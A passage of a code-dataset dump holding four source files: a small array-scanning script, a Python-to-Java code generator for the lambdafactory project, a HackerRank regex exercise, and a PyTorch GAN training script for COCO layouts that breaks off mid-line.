+{"seq_id":"19634774","text":"cases=int(input(\"\"))\nfor m in range(0,cases):\n size=int(input(\"\"))\n results=[]\n numbers=list(map(int, input().split()))\n for a in range(1,size-1):\n if(numbers[a]>numbers[a-1] and numbers[a]<numbers[a+1]):\n results.append(a+1)\n if(len(results)>0):\n print(results[0])\n else:\n print(\"-1\")\n results.clear()","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231247684","text":"#!/usr/bin/env python\n# Encoding: iso-8859-1\n# vim: tw=80 ts=4 sw=4 noet\n# -----------------------------------------------------------------------------\n# Project : XXX\n# -----------------------------------------------------------------------------\n# Author : Sebastien Pierre \n# License : Revised BSD License\n# -----------------------------------------------------------------------------\n# Creation : 30-May-2007\n# Last mod : 02-Jun-2007\n# -----------------------------------------------------------------------------\n\nfrom modelwriter import AbstractWriter, flatten\nfrom resolver import AbstractResolver\nimport interfaces, reporter\n\nclass Resolver(AbstractResolver):\n\tpass\n\n#------------------------------------------------------------------------------\n#\n# Java Runtime Writer\n#\n#------------------------------------------------------------------------------\n\nclass RuntimeWriter:\n\n\tdef __init__(self, writer):\n\t\tself.writer = writer\n\t\tself.write = self.writer.write\n\t\tself.p = self.prefix = \"lambdafactory\"\n\n\t#--------------------------------------------------------------------------\n\t# RENAMING\n\t#--------------------------------------------------------------------------\n\n\tdef className( self, name ):\n\t\t\"\"\"Normalizes the given name to be like a class name\"\"\"\n\t\treturn \"\".join(n[0].upper() + n[1:] for n in name.split(\"_\"))\n\n\tdef moduleName( self, name ):\n\t\t\"\"\"Normalizes the given name to be like a 
module name\"\"\"\n\t\treturn \"\".join(n[0].upper() + n[1:] for n in name.split(\"_\"))\n\n\t#--------------------------------------------------------------------------\n\t# RUNTIME CLASSES\n\t#--------------------------------------------------------------------------\n\n\tdef moduleClass( self ):\n\t\treturn \"%s.Class\" % (self.p)\n\n\tdef objectClass( self ):\n\t\treturn \"%s.Object\" % (self.p)\n\n\tdef valueClass( self ):\n\t\treturn \"java.lang.Object\" \n\n\tdef op( self, name ):\n\t\treturn \"%s.Runtime.%s\" % (self.prefix, name)\n\n\tdef compute( self, operator ):\n\t\tif operator == \"+\":\n\t\t\top = \"Add\"\n\t\telif operator == \"-\":\n\t\t\top = \"Substract\"\n\t\telif operator == \"/\":\n\t\t\top = \"Divide\"\n\t\telif operator == \"*\":\n\t\t\top = \"Multiply\"\n\t\telse:\n\t\t\traise Exception(\"Unsupported operator for the Java back-end: %s\" % (operator))\n\t\treturn self.op(\"compute\" + op)\n\n\t#--------------------------------------------------------------------------\n\t# RUNTIME OPERATION\n\t#--------------------------------------------------------------------------\n\n\t\n\tdef new(self, classElement):\n\t\treturn \"NEW0(%s)\" % (self.writer.getAbsoluteName(classElement)) \n\t\n\tdef newClass(self, classElement):\n\t\tparents = classElement.getParentClassesRefs()\n\t\tparent = parents and self.write(parents[0]) or \"UNDEFINED\"\n\t\treturn self.op(\"newClass(%s, %s)\" % (\n\t\t\tself.writer.getAbsoluteName(classElement),\n\t\t\tparent\n\t\t))\n\n\tdef range(self):\n\t\tpass\n\t\n\tdef superFor(self):\n\t\tpass\n\n\tdef typeFor(self, element):\n\t\tif isinstance(element, interfaces.IModule):\n\t\t\treturn \"SgModule*\"\n\t\telif isinstance(element, interfaces.IClass):\n\t\t\treturn \"SgClass*\"\n\t\telse:\n\t\t\treturn \"SgValue\"\n\n\tdef slice(self, target, slice):\n\t\t# use the given target and slice, rather than an undefined 'operation'\n\t\treturn self.op(\"slice(%s,%s)\" % (\n\t\t\tself.write(target),\n\t\t\tself.write(slice)\n\t\t))\n\n#------------------------------------------------------------------------------\n#\n# Java Source Code Writer\n#\n#------------------------------------------------------------------------------\n\nclass Writer(AbstractWriter):\n\n\tdef __init__( self, reporter=reporter.DefaultReporter ):\n\t\tAbstractWriter.__init__(self, reporter)\n\t\tself.resolver = Resolver(reporter=reporter)\n\t\tself.inInvocation = False\n\t\tself.runtime = self.rt = RuntimeWriter(self)\n\t\tself.closureCounter = 0\n\t\tself.accumulator = []\n\t\n\tdef accumulate(self, code):\n\t\t\"\"\"Accumulates code that will be dumped and flushed when the 'dump' method\n\t\tis called. This is specific to the C back-end and allows doing all kinds\n\t\tof stuff in the module initialization phase\"\"\"\n\t\tself.accumulator.append(code)\n\t\n\tdef dump(self):\n\t\t\"\"\"Returns the content of the accumulator (as a list) and empties\n\t\tit.\"\"\"\n\t\tres = self.accumulator\n\t\tself.accumulator=[]\n\t\treturn res\n\n\tdef generateClosureName(self, closure):\n\t\tparent = closure.getParent()\n\t\tres = \"%s_lambda%s\" % (\n\t\t\tparent and self.getAbsoluteName(parent) or \"GLOBAL\",\n\t\t\tself.closureCounter\n\t\t)\n\t\tself.closureCounter += 1\n\t\treturn res\n\n\tdef getAbsoluteName( self, element, rename=None ):\n\t\t\"\"\"Returns the absolute name for the given element. This is the '.'
This is the '.'\n\t\tconcatenation of the individual names of the parents.\"\"\"\n\t\tnames = [rename or element.getName()]\n\t\twhile element.getParent():\n\t\t\telement = element.getParent()\n\t\t\tif isinstance(element, interfaces.IModule):\n\t\t\t\tnames.insert(0, self.rt.moduleName(element.getName()))\n\t\t\telif isinstance(element, interfaces.IClass):\n\t\t\t\tnames.insert(0, self.rt.className(element.getName()))\n\t\t\telif not isinstance(element, interfaces.IProgram):\n\t\t\t\tnames.insert(0, element.getName())\n\t\treturn \".\".join(names)\n\n\tdef renameModuleSlot(self, name):\n\t\tif name == interfaces.Constants.ModuleInit: name = \"initialize\"\n\t\tif name == interfaces.Constants.MainFunction: name = \"main\"\n\t\treturn name\n\n\tdef writeModule( self, moduleElement, contentOnly=False ):\n\t\t\"\"\"Writes a Module element.\"\"\"\n\t\tcode = [\n\t\t]\n\t\tfor slot, value in moduleElement.getSlots():\n\t\t\tres = self.write(value)\t\n\t\t\tif type(res) in (unicode,str):\n\t\t\t\tcode.append(res)\n\t\t\telse:\n\t\t\t\tcode.extend(res)\n\t\tcode = [\n\t\t\t'public class %s extends %s {' % (\n\t\t\tself.rt.moduleName(moduleElement.getName()),self.rt.moduleClass()),\n\t\t\tcode,\n\t\t\t[\"public static void init() {\",\n\t\t\tself.dump(),\n\t\t\t\"}\"\n\t\t\t],\n\t\t\t\"}\"\n\t\t]\n\t\treturn self._format(\n\t\t\t*code\n\t\t)\n\n\tdef writeClass( self, classElement ):\n\t\t\"\"\"Writes a class element.\"\"\"\n\t\tparents = classElement.getParentClassesRefs()\n\t\tparent = self.rt.objectClass()\n\t\tclass_name = self.rt.className(classElement.getName())\n\t\tif len(parents) == 1:\n\t\t\tparent = self.write(parents[0])\n\t\t\tparent = parent[:-len(\".class\")]\n\t\telif len(parents) > 1:\n\t\t\traise Exception(\"Java back-end only supports single inheritance\")\n\t\treturn self._format(\n\t\t\t\"public static class %s extends %s {\" % (class_name, parent),\n\t\t\t\t[\tself._document(classElement),\n\t\t\t\t\t\"\\n\".join(map(self.write, flatten(\n\t\t\t\t\tclassElement.getClassAttributes(),\n\t\t\t\t\tclassElement.getAttributes(),\n\t\t\t\t\tclassElement.getConstructors(),\n\t\t\t\t\tclassElement.getDestructors(),\n\t\t\t\t\tclassElement.getClassMethods(),\n\t\t\t\t\tclassElement.getInstanceMethods()\n\t\t\t\t)))],\n\t\t\t\"}\\n\"\n\t\t)\n\n\tdef writeMethod( self, methodElement ):\n\t\t\"\"\"Writes a method element.\"\"\"\n\t\tmethod_name = methodElement.getName()\n\t\tif method_name == interfaces.Constants.Constructor: method_name = \"initialize\"\n\t\tif method_name == interfaces.Constants.Destructor: method_name = \"destroy\"\n\t\treturn self._format(\n\t\t\tself._document(methodElement),\n\t\t\t\"public %s %s(%s){\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tmethod_name,\n\t\t\t\t\", \".join(map(self.write, methodElement.getArguments()))\n\t\t\t),\n\t\t\tself.writeFunctionWhen(methodElement),\n\t\t\tmap(self.writeStatement, methodElement.getOperations()),\n\t\t\t[self.writeImplicitReturn(methodElement)],\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeClassMethod( self, methodElement ):\n\t\t\"\"\"Writes a class method element.\"\"\"\n\t\tmethod_name = methodElement.getName()\n\t\treturn self._format(\n\t\t\tself._document(methodElement),\n\t\t\t\"public static %s %s(%s){\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tmethod_name,\n\t\t\t\t\", \".join(map(self.write, methodElement.getArguments()))\n\t\t\t),\n\t\t\tself.writeFunctionWhen(methodElement),\n\t\t\tmap(self.writeStatement, methodElement.getOperations()),\n\t\t\t[self.writeImplicitReturn(methodElement)],\n\t\t\t\"}\"\n\t\t)\n\n\tdef 
writeConstructor( self, element ):\n\t\t\"\"\"Writes a method element.\"\"\"\n\t\tcurrent_class = self.getCurrentClass()\n\t\tattributes = []\n\t\tfor a in current_class.getAttributes():\n\t\t\tif not a.getDefaultValue(): continue\n\t\t\tattributes.append(\"this.%s = %s(%s);\" % (\n\t\t\t\ta.getReferenceName(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(a.getDefaultValue()))\n\t\t\t)\n\t\treturn self._format(\n\t\t\tself._document(element),\n\t\t\t\"public %s(%s){\" % (\n\t\t\t\tself.rt.className(current_class.getName()),\n\t\t\t\t\", \".join(map(self.write, element.getArguments()))\n\t\t\t),\n\t\t\tattributes or None,\n\t\t\tmap(self.writeStatement, element.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeImplicitReturn( self, function ):\n\t\tif not function.endsWithTermination():\n\t\t\treturn \"return null;\"\n\t\telse:\n\t\t\treturn \"\"\n\n\tdef writeClosure( self, closure ):\n\t\t\"\"\"Writes a closure element.\"\"\"\n\t\treturn self._format(\n\t\t\t\"new org.sugarlang.runtime.Closure {\",\n\t\t\t[\n\t\t\t\t\", \".join(map(self.write, closure.getArguments()))\n\t\t\t],\n\t\t\tmap(self.writeStatement, closure.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeClosureBody(self, closure):\n\t\treturn self._format('{', map(self.writeStatement, closure.getOperations()), '}')\n\n\tdef writeFunctionWhen(self, function ):\n\t\tres = []\n\t\tfor a in function.annotations(withName=\"when\"):\n\t\t\tres.append(\"if (!(%s)) {return;}\" % (self.write(a.getContent())))\n\t\treturn self._format(res) or None\n\n\tdef writeFunctionPost(self, function ):\n\t\tres = []\n\t\tfor a in function.annotations(withName=\"post\"):\n\t\t\tres.append(\"if (!(%s)) {throw new Exception(\\\"Assertion failed\\\");}\" % (self.write(a.getContent())))\n\t\treturn self._format(res) or None\n\t\n\tdef writeFunction( self, function ):\n\t\t\"\"\"Writes a function element.\"\"\"\n\t\tparent = function.getParent()\n\t\tname = function.getName()\n\t\tresult = self.rt.valueClass()\n\t\targs = \", \".join(map(self.write, function.getArguments()))\n\t\treturns = [self.writeImplicitReturn(function)]\n\t\tif name == interfaces.Constants.MainFunction:\n\t\t\tname = \"main\"\n\t\t\tresult = \"void\"\n\t\t\targs = \"String[] args\"\n\t\t\treturns = ()\n\t\telif name == interfaces.Constants.ModuleInit:\n\t\t\tname = \"moduleInit\"\n\t\t\tresult = \"void\"\n\t\t\treturns = ()\n\t\tif parent and isinstance(parent, interfaces.IModule):\n\t\t\tres = [\n\t\t\t\t\"public static %s %s (%s){\" % (\n\t\t\t\t\tresult,\n\t\t\t\t\tname,\n\t\t\t\t\targs,\n\t\t\t\t),\n\t\t\t\t[self._document(function)],\n\t\t\t\tself.writeFunctionWhen(function),\n\t\t\t\tmap(self.writeStatement, function.getOperations()),\n\t\t\t\treturns,\n\t\t\t\t\"}\"\n\t\t\t]\n\t\t\treturn res\n\t\telse:\n\t\t\targs = []\n\t\t\ti = 0\n\t\t\tfor a in function.getArguments():\n\t\t\t\targs.append(\"java.lang.Object %s=%s(args[%s]);\" % (\n\t\t\t\t\ta.getReferenceName(),\n\t\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\t\ti\n\t\t\t\t))\n\t\t\t\ti += 1\n\t\t\tres = [\n\t\t\t\t\"new %s() { public java.lang.Object do(java.lang.Object[] args) {\" % (self.rt.op(\"Closure\")),\n\t\t\t\targs,\n\t\t\t\tmap(self.writeStatement, function.getOperations()),\n\t\t\t\t\"}}\"\n\t\t\t]\n\t\t\treturn res\n\n\tdef writeBlock( self, block ):\n\t\t\"\"\"Writes a block element.\"\"\"\n\t\treturn self._format(\n\t\t\t\"{\",\n\t\t\tmap(self.write, block.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeArgument( self, argElement ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\treturn \"%s %s\" % 
(\n\t\t\tself.rt.valueClass(),\n\t\t\targElement.getReferenceName(),\n\t\t)\n\n\tdef writeAttribute( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\treturn self._format(\n\t\t\tself._document(element),\n\t\t\t'public %s %s;' % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName()\n\t\t\t)\n\t\t)\n\n\tdef writeClassAttribute( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\tdefault_value = element.getDefaultValue()\n\t\tclass_name = self.getAbsoluteName(self.getCurrentClass())\n\t\tif default_value:\n\t\t\treturn \"public static %s %s = (%s)%s(%s);\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName(),\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(default_value)\n\t\t\t)\n\t\telse:\n\t\t\treturn \"public static %s %s;\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName()\n\t\t\t)\n\n\tdef writeReference( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\tsymbol_name = element.getReferenceName()\n\t\tvalue, scope = self.resolve(symbol_name)\n\t\tif scope and scope.hasSlot(symbol_name):\n\t\t\tvalue = scope.getSlot(symbol_name)\n\t\tif symbol_name == \"self\":\n\t\t\treturn \"this\"\n\t\telif symbol_name == \"super\":\n\t\t\tassert self.resolve(\"this\"), \"Super must be used inside method\"\n\t\t\t# FIXME: Should check that the element has a method in parent scope\n\t\t\treturn \"super\"\n\t\t# If there is no scope, then the symmbol is undefined\n\t\tif not scope:\n\t\t\tif symbol_name == \"print\":\n\t\t\t\treturn '%s(lambdafactory.Runtime.class,\"print\")' % (self.rt.op(\"resolve\"))\n\t\t\telse:\n\t\t\t\treturn symbol_name\n\t\t# It is a method/property of the current class\n\t\telif self.getCurrentClass() == scope:\n\t\t\tif isinstance(value, interfaces.IInstanceMethod):\n\t\t\t\treturn \"Runtime.resolveMethod(this,'%s')\" % (symbol_name)\n\t\t\telif isinstance(value, interfaces.IClassMethod):\n\t\t\t\treturn \"Runtime.resolveClassMethod(this,'%s')\" % (symbol_name)\n\t\t\telif isinstance(value, interfaces.IClassAttribute):\n\t\t\t\treturn \"%s\" % (symbol_name)\n\t\t\telse:\n\t\t\t\tassert isinstance(value, interfaces.IAttribute)\n\t\t\t\treturn \"%s\" % (symbol_name)\n\t\t# It is a local variable\n\t\telif self.getCurrentFunction() == scope:\n\t\t\treturn symbol_name\n\t\t# It is a property of a module\n\t\telif isinstance(scope, interfaces.IModule):\n\t\t\tnames = [scope.getName(), symbol_name]\n\t\t\twhile scope.getParent():\n\t\t\t\tscope = scope.getParent()\n\t\t\t\tif not isinstance(scope, interfaces.IProgram):\n\t\t\t\t\tnames.insert(0, scope.getName())\n\t\t\t# In Java, you cannot reference classes directly, so if you have\n\t\t\t# class 'org.pouet.MyClass' you have to reference it by using\n\t\t\t# 'org.pouet.MyClass.class'\n\t\t\tif isinstance(value, interfaces.IClass):\n\t\t\t\tnames.append(\"class\")\n\t\t\treturn \".\".join(names)\n\t\t# It is a property of a class\n\t\telif isinstance(scope, interfaces.IClass):\n\t\t\t# And the class is one of the parent class\n\t\t\tif scope in self.getCurrentClassAncestors():\n\t\t\t\treturn \"$G(self,%s)\" % (symbol_name)\n\t\t\t# Otherwise it is an outside class, and we have to check that the\n\t\t\t# value is not an instance slot\n\t\t\telse:\n\t\t\t\tnames = [scope.getName()]\n\t\t\t\twhile scope.getParent():\n\t\t\t\t\tscope = scope.getParent()\n\t\t\t\t\tnames.insert(0, scope.getName())\n\t\t\t\treturn \"$G(%s,%s)\" % (\"_\".join(names), symbol_name)\n\t\t# FIXME: This is an exception... 
iteration being an operation, not a\n\t\t# context...\n\t\telif isinstance(scope, interfaces.IIteration):\n\t\t\treturn symbol_name\n\t\telif isinstance(scope, interfaces.IClosure):\n\t\t\treturn symbol_name\n\t\telse:\n\t\t\traise Exception(\"Unsupported scope:\" + str(scope))\n\n\tJAVA_OPERATORS = {\n\t\t\t\t\"and\":\"&&\",\n\t\t\t\t\"is\":\"==\",\n\t\t\t\t\"is not\":\"!=\",\n\t\t\t\t\"not\":\"!\",\n\t\t\t\t\"or\":\"||\"\n\t}\n\tdef writeOperator( self, operator ):\n\t\t\"\"\"Writes an operator element.\"\"\"\n\t\to = operator.getReferenceName()\n\t\to = self.JAVA_OPERATORS.get(o) or o\n\t\treturn \"%s\" % (o)\n\n\tdef writeNumber( self, number ):\n\t\t\"\"\"Writes a number element.\"\"\"\n\t\treturn \"%s\" % (number.getActualValue())\n\n\tdef writeString( self, element ):\n\t\t\"\"\"Writes a string element.\"\"\"\n\t\treturn '\"%s\"' % (element.getActualValue().replace('\"', '\\\\\"'))\n\n\tdef writeList( self, element ):\n\t\t\"\"\"Writes a list element.\"\"\"\n\t\treturn '%s(new Object[] {%s})' % (self.rt.op(\"list\"),\n\t\t\t\", \".join([ self.write(e) for e in element.getValues()]))\n\n\tdef writeDictKey( self, key ):\n\t\tif isinstance(key, interfaces.IString):\n\t\t\treturn self.write(key)\n\t\telse:\n\t\t\t# FIXME: Raise an error, because JavaScript only allows strings as keys\n\t\t\treturn \"(%s)\" % (self.write(key))\n\n\tdef writeDict( self, element ):\n\t\treturn '%s(%s)' % (self.rt.op(\"dict\"),\n\t\t\t\", \".join([\n\t\t\t\t\"%s:%s\" % ( self.writeDictKey(k),self.write(v))\n\t\t\t\tfor k,v in element.getItems()\n\t\t\t])\n\t\t)\n\t\t\n\tdef writeAllocation( self, allocation ):\n\t\t\"\"\"Writes an allocation operation.\"\"\"\n\t\ts = allocation.getSlotToAllocate()\n\t\tv = allocation.getDefaultValue()\n\t\tif v:\n\t\t\treturn \"%s %s=%s(%s)\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\ts.getReferenceName(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(v)\n\t\t\t)\n\t\telse:\n\t\t\treturn \"%s %s\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\ts.getReferenceName()\n\t\t\t)\n\n\tdef writeAssignation( self, assignation ):\n\t\t\"\"\"Writes an assignation operation.\"\"\"\n\t\treturn \"%s = %s(%s)\" % (\n\t\t\tself.write(assignation.getTarget()),\n\t\t\tself.rt.op(\"box\"),\n\t\t\tself.write(assignation.getAssignedValue())\n\t\t)\n\n\tdef writeEnumeration( self, operation ):\n\t\t\"\"\"Writes an enumeration operation.\"\"\"\n\t\tstart = operation.getStart() \n\t\tend = operation.getEnd() \n\t\tif isinstance(start, interfaces.ILiteral): start = self.write(start)\n\t\telse: start = \"(%s)\" % (self.write(start))\n\t\tif isinstance(end, interfaces.ILiteral): end = self.write(end)\n\t\telse: end = \"(%s)\" % (self.write(end))\n\t\tres = \"%s(%s,%s)\" % (self.rt.op(\"range\"), start, end)\n\t\tstep = operation.getStep()\n\t\tif step: res += \" step \" + self.write(step)\n\t\treturn res\n\n\tdef writeResolution( self, resolution ):\n\t\t\"\"\"Writes a resolution operation.\"\"\"\n\t\tif resolution.getContext():\n\t\t\treturn '%s(%s,\"%s\")' % (self.rt.op(\"resolve\"),self.write(resolution.getContext()), resolution.getReference().getReferenceName())\n\t\telse:\n\t\t\treturn \"%s\" % (resolution.getReference().getReferenceName())\n\n\tdef isLiteral( self, element ):\n\t\tif isinstance( element, interfaces.IComputation ):\n\t\t\tfor o in element.getOperands():\n\t\t\t\tif not self.isLiteral(o):\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn isinstance(element, interfaces.ILiteral)\n\n\tdef writeComputation( self, computation ):\n\t\t\"\"\"Writes a computation 
operation.\"\"\"\n\t\t# FIXME: For now, we supposed operator is prefix or infix\n\t\toperands = filter(lambda x:x!=None,computation.getOperands())\n\t\toperator = computation.getOperator()\n\t\t# FIXME: Add rules to remove unnecessary parens\n\t\tif len(operands) == 1:\n\t\t\toperand = operands[0]\n\t\t\tif self.isLiteral(operand):\n\t\t\t\tres = \"%s %s\" % (\n\t\t\t\t\tself.write(operator),\n\t\t\t\t\tself.write(operand)\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tres = \"%s(%s)\" % (\n\t\t\t\t\tself.rt.compute(self.write(operator)),\n\t\t\t\t\tself.write(operand)\n\t\t\t\t)\n\t\telse:\n\t\t\ta = operands[0]\n\t\t\tb = operands[1]\n\t\t\tif self.isLiteral(computation):\n\t\t\t\tres = \"%s %s %s\" % (\n\t\t\t\t\tself.write(operands[0]),\n\t\t\t\t\tself.write(operator),\n\t\t\t\t\tself.write(operands[1])\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tres = '%s(%s,%s)' % (\n\t\t\t\t\tself.rt.compute(self.write(operator)),\n\t\t\t\t\tself.write(operands[0]),\n\t\t\t\t\tself.write(operands[1])\n\t\t\t\t)\n\n\t\tif filter(lambda x:isinstance(x, interfaces.IComputation), self.contexts[:-1]):\n\t\t\tres = \"(%s)\" % (res)\n\t\treturn res\n\n\tdef writeInvocation( self, invocation ):\n\t\t\"\"\"Writes an invocation operation.\"\"\"\n\t\tself.inInvocation = True\n\t\tt = self.write(invocation.getTarget())\n\t\tself.inInvocation = False\n\t\tif t == \"super\":\n\t\t\treturn \"super(%s)\" % (\n\t\t\t\t\", \".join(map(self.write, invocation.getArguments()))\n\t\t\t)\n\t\telse:\n\t\t\treturn \"%s(%s, new Object[]{%s})\" % (\n\t\t\t\tself.rt.op(\"invoke\"),\n\t\t\t\tt,\n\t\t\t\t\", \".join(map(self.write, invocation.getArguments()))\n\t\t\t)\n\t\n\tdef writeInstanciation( self, operation ):\n\t\t\"\"\"Writes an invocation operation.\"\"\"\n\t\tlen_args = len(operation.getArguments())\n\t\tclass_name = self.write(operation.getInstanciable())\n\t\tassert class_name.endswith(\".class\")\n\t\tclass_name = class_name[:-len(\".class\")]\n\t\tif len_args == 0:\n\t\t\treturn \"new %s()\" % (class_name)\n\t\telse:\n\t\t\treturn \"new %s(%s)\" % (\n\t\t\t\tclass_name,\n\t\t\t\t\", \".join(\"%s(%s)\" % (self.rt.op(\"box\"),self.write(a)) for a in operation.getArguments())\n\t\t\t)\n\n\tdef writeSelection( self, selection ):\n\t\trules = selection.getRules()\n\t\tresult = []\n\t\tfor i in range(0,len(rules)):\n\t\t\trule = rules[i]\n\t\t\tprocess = rule.getProcess() \n\t\t\t# If the rule process is a block/closure, we simply expand the\n\t\t\t# closure. So we have\n\t\t\t# if (...) { code }\n\t\t\t# instead of\n\t\t\t# if (...) 
{ (function(){code})() }\n\t\t\tif process and isinstance(process, interfaces.IClosure):\n\t\t\t\tprocess = self.writeClosureBody(process)\n\t\t\telif process:\n\t\t\t\tprocess = \"%s\" % (self.write(process))\n\t\t\telse:\n\t\t\t\tprocess = '{}'\n\t\t\tif i==0:\n\t\t\t\trule_code = (\n\t\t\t\t\t\"if ( %s )\" % (self.write(rule.getPredicate())),\n\t\t\t\t\tprocess,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\trule_code = (\n\t\t\t\t\t\"else if ( %s )\" % (self.write(rule.getPredicate())),\n\t\t\t\t\tprocess,\n\t\t\t\t)\n\t\t\tresult.extend(rule_code)\n\t\treturn self._format(*result)\n\n\tdef writeIteration( self, iteration ):\n\t\t\"\"\"Writes an iteration operation.\"\"\"\n\t\tit_name = self._unique(\"_iterator\")\n\t\treturn self._format(\n\t\t\tself.rt.op(\"iterate(%s,\") % (self.write(iteration.getIterator())),\n\t\t\tself.write(iteration.getClosure()),\n\t\t\t\")\"\n\t\t)\n\n\tdef writeSliceOperation( self, operation ):\n\t\treturn self._format(\n\t\t\tself.runtime.slice(operation.getTarget(), operation.getSlice()) \n\t\t)\n\n\tdef writeEvaluation( self, operation ):\n\t\t\"\"\"Writes an evaluation operation.\"\"\"\n\t\treturn \"%s\" % ( self.write(operation.getEvaluable()) )\n\n\tdef writeTermination( self, termination ):\n\t\t\"\"\"Writes a termination operation.\"\"\"\n\t\treturn \"return %s(%s)\" % (\n\t\t\tself.rt.op(\"box\"),\n\t\t\tself.write(termination.getReturnedEvaluable())\n\t\t)\n\n\tdef writeStatement(self, *args):\n\t\treturn self.write(*args) + \";\"\n\t\n\tdef _document( self, element ):\n\t\tif element.hasDocumentation():\n\t\t\tdoc = element.getDocumentation()\n\t\t\tres = []\n\t\t\tfor line in doc.getContent().split(\"\\n\"):\n\t\t\t\tres.append(\"// \" + line)\n\t\t\treturn \"\\n\".join(res)\n\t\telse:\n\t\t\treturn None\n\n# EOF\n","sub_path":"Sources/python/lambdafactory/languages/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":20573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628239077","text":"# import re\r\n\r\n# n = int(input())\r\n\r\n# for i in range(n):\r\n#     print(re.sub(r'(?<= )(&&|\\|\\|)(?= )', lambda x: 'and' if x.group() == '&&' else 'or', input()))\r\n\r\nimport re\r\n\r\nfor _ in range(int(input())):\r\n    s = input()\r\n    s = re.sub(r\" &&(?= )\", \" and\", s)\r\n    s = re.sub(r\" \\|\\|(?= )\", ' or', s)\r\n    print(s)\r\n\r\n\r\n\r\n","sub_path":"onlinecoding/hackerrank/python/20-6-19/regex/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236288150","text":"import torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data.dataloader import DataLoader\nimport random\nfrom components.discriminator_CNN import Discriminator\nfrom dataloaders.dataset_coco import DatasetCOCO\nfrom models.model_core_new import CoreModel\nfrom utils.constants import *\nfrom utils.criteria import *\n\n\ndef calculate_criteria(predicted_boxes, predicted_labels, boxes, labels, key_number):\n    predicted_labels = predicted_labels.contiguous().view(-1)\n    target_labels = labels.contiguous().view(-1)\n    predicted_boxes = predicted_boxes.contiguous().view(-1, 4)\n    target_boxes = boxes.contiguous().view(-1, 4)\n    return classification_score(predicted_labels, target_labels), \\\n           classification_score(predicted_labels[:key_number], target_labels[:key_number]), \\\n           IoU_score(predicted_boxes, target_boxes, predicted_labels, target_labels), \\\n           IoU_score(predicted_boxes[:key_number], 
target_boxes[:key_number],\n predicted_labels[:key_number], target_labels[:key_number])\n\n\ndef label2word(labels):\n word_list = []\n with open('./config/COCO/label.json', \"r\") as label_json:\n label_dict = json.load(label_json)\n for label in labels:\n word_list.append(label_dict[str(int(label.item()))])\n return word_list\n\n\ndef stepFromEpoch(epoch):\n return int(1 / (0.2 + 0.8 * math.exp(-epoch)))\n # return 1\n\nclass GANTrainer(object):\n def __init__(self, model_name=\"GAN\", device=\"cuda:2\"):\n super().__init__()\n encoder_config = load_json(\"./config/param/encoder.json\")\n gan_config = load_json(\"./config/param/gan.json\")\n data_config = load_json(\"./config/param/data_loader.json\")\n train_data_config = data_config['train']\n val_data_config = data_config['val']\n common_data_config = data_config['common']\n train_data_config.update(common_data_config)\n val_data_config.update(common_data_config)\n self.params = gan_config\n self.device = torch.device(device if torch.cuda.is_available() else 'cpu')\n self.model_name = model_name\n print(self.device)\n\n train_dataset = DatasetCOCO(params=train_data_config)\n print(\"Train Dataset Loaded!\")\n val_dataset = DatasetCOCO(params=val_data_config)\n print(\"Val Dataset Loaded!\")\n\n self.train_data_loader = DataLoader(dataset=train_dataset, batch_size=self.params['batch_size'],\n num_workers=4, shuffle=True)\n self.val_data_loader = DataLoader(dataset=val_dataset, batch_size=self.params['batch_size'],\n num_workers=4, shuffle=False)\n\n # self.sampleModel = SampleModel({\n # 'encoder_config': encoder_config,\n # 'mlp_config': mlp_config,\n # 'device': self.device,\n # 'params': {\n # 'alpha': sample_config['alpha']\n # }\n # })\n # self.load(self.sampleModel, './saved/SampleModel-19.pt')\n gan_config.update({\n 'encoder_config': encoder_config,\n 'device': self.device\n })\n self.generator = CoreModel(gan_config).to(self.device)\n self.discriminator = Discriminator().to(self.device)\n self.criterion = nn.BCELoss()\n print(\"Model initialized!\")\n self.generator_optimizer = optim.Adam(self.generator.parameters(), lr=self.params['learning_rate'])\n self.discriminator_optimizer = optim.Adam(self.discriminator.parameters(), lr=self.params['learning_rate'])\n\n def generator_pre_train(self, epoch):\n self.generator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = 